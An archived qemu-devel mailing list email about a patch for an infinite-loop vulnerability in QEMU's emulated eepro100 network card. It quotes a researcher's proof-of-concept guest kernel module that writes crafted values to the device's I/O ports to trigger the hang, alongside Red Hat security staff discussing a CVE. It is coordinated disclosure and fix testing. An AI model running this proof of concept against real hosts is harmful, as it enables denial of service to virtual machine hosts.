From mboxrd@z Thu Jan 1 00:00:00 1970 Received: from eggs.gnu.org ([2001:4830:134:3::10]:35922) by lists.gnu.org with esmtp (Exim 4.71) (envelope-from ) id 1ZzgPZ-0002yc-Q2 for qemu-devel@nongnu.org; Fri, 20 Nov 2015 02:47:14 -0500 Received: from Debian-exim by eggs.gnu.org with spam-scanned (Exim 4.71) (envelope-from ) id 1ZzgPV-0006e4-NC for qemu-devel@nongnu.org; Fri, 20 Nov 2015 02:47:13 -0500 Received: from v220110690675601.yourvserver.net ([37.221.199.173]:38066) by eggs.gnu.org with esmtp (Exim 4.71) (envelope-from ) id 1ZzgPV-0006dy-Dq for qemu-devel@nongnu.org; Fri, 20 Nov 2015 02:47:09 -0500 Message-ID: <564ECFF9.2090803@weilnetz.de> Date: Fri, 20 Nov 2015 08:47:05 +0100 From: Stefan Weil MIME-Version: 1.0 References: <5620F082.5040007@redhat.com> <5625AEE0.7070908@redhat.com> <56397C1D.6070304@redhat.com> In-Reply-To: Content-Type: multipart/alternative; boundary="------------020208030407030105000201" Subject: Re: [Qemu-devel] [PATCH] eepro100: prevent an infinite loop over same command block List-Id: List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , To: Qinghao Tang , P J P Cc: Paolo Bonzini , Jason Wang , QEMU Developers , Peter Maydell This is a multi-part message in MIME format. --------------020208030407030105000201 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit Am 20.11.2015 um 07:29 schrieb Qinghao Tang: > I think the patch can solve this vulnerability. > I confirm that the loop exist , the poc code can prove that. > > > #include > #include > #include > #include > #define PAGE_OFFSET 0x0C000000 > MODULE_LICENSE("GPL"); > static int hello_init(void) > { > > void* pvirt; > void* pphy; > unsigned long* pdbal; > unsigned long* tdt; > unsigned short status; > pvirt =kmalloc(0x100,GFP_KERNEL); > memset(pvirt,0,0x100);//control the filed of eepro100_tx_t struct > pphy=virt_to_phys(pvirt);//get physical address > printk(KERN_ALERT "%08x\n",pvirt); > printk(KERN_ALERT "%08x\n",pphy); > outl(pphy,0xc004);//write the address > outw(0x0060,0xc002); > outl(0,0xc004);//write the offset > outw(0x0010,0xc002); //enter action_command function > > > return 0; > } > static void hello_exit(void) > { > printk(KERN_ALERT "goodbye,kernel\n"); > } > module_init(hello_init); > module_exit(hello_exit); > MODULE_AUTHOR("qinghao tang"); > MODULE_DESCRIPTION("poc for eepro100 infinite loop vulnerability\n"); > > 2015-11-20 14:10 GMT+08:00 P J P >: > > Hello Qinghao, > > +-- On Fri, 20 Nov 2015, Qinghao Tang wrote --+ > | Currently what problem do you have? Perhaps I could provide more > support. > > Could you please confirm if the proposed patch here fixes the issue. > Secondly there is uncertainty if the CB loop like Jason mentioned > earlier is > possible. > > | And please give this vulnerability a cve id. > > Yes I will; As soon as the patch is ready for upstream. > > Thank you. > -- > Prasad J Pandit / Red Hat Product Security Team > 47AF CE69 3A90 54AA 9045 1053 DD13 3D32 FE5B 041F > > Thanks for this example. Could you please try whether the patch which I have just sent fixes the problem for you? And please CC me on any e-mails regarding eepro100. Stefan --------------020208030407030105000201 Content-Type: text/html; charset=utf-8 Content-Transfer-Encoding: quoted-printable
Am 20.11.2015 um 07:29 schrieb Qinghao Tang:
I think the patch can solve this vulnerability.
I confirm that the loop exist , the poc code can prove that.


#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <asm/io.h>
#define PAGE_OFFSET 0x0C000000
MODULE_LICENSE("GPL");
static int hello_init(void)
{

=C2=A0 void* pvirt;
=C2=A0 void* pphy;
=C2=A0 unsigned long* pdbal;
=C2=A0 unsigned long* tdt;
=C2=A0 unsigned short status;
=C2=A0 pvirt =3Dkmalloc(0x100,GFP_KERNEL);
=C2=A0 memset(pvirt,0,0x100);//control the filed of eepro100_tx_t struct
=C2=A0 pphy=3Dvirt_to_phys(pvirt);//get physical address
=C2=A0 printk(KERN_ALERT "%08x\n",pvirt);
=C2=A0 printk(KERN_ALERT "%08x\n",pphy);
=C2=A0 outl(pphy,0xc004);//write the address
=C2=A0 outw(0x0060,0xc002);
=C2=A0 outl(0,0xc004);//write the offset
=C2=A0 outw(0x0010,0xc002); //enter action_command function
=C2=A0=C2=A0
=C2=A0=C2=A0
return 0;
}
static void hello_exit(void)
{
printk(KERN_ALERT "goodbye,kernel\n");
}
module_init(hello_init);
module_exit(hello_exit);
MODULE_AUTHOR("qinghao tang");
MODULE_DESCRIPTION("poc for eepro100 infinite loop vulnerability\n");

2015-11-20 14:10 GMT+08:00 P J P <ppandi= t@redhat.com>:
=C2=A0 Hell= o Qinghao,

+-- On Fri, 20 Nov 2015, Qinghao Tang wrote --+
| Currently what problem do you have? Perhap= s I could provide more support.

=C2=A0 Could you please confirm if the proposed patch = here fixes the issue.
Secondly there is uncertainty if the CB loop like Jason mentioned earlier is
possible.

| And please give this vulnerability a cve id.

=C2=A0 Yes I will; As soon as the patch is ready for upstream.

Thank you.
--
Prasad J Pandit / Red Hat Product Security Team
47AF CE69 3A90 54AA 9045 1053 DD13 3D32 FE5B 041F


Thanks for this example. Could you please try whether the patch
which I have just sent fixes the problem for you?

And please CC me on any e-mails regarding eepro100.

Stefan

--------------020208030407030105000201--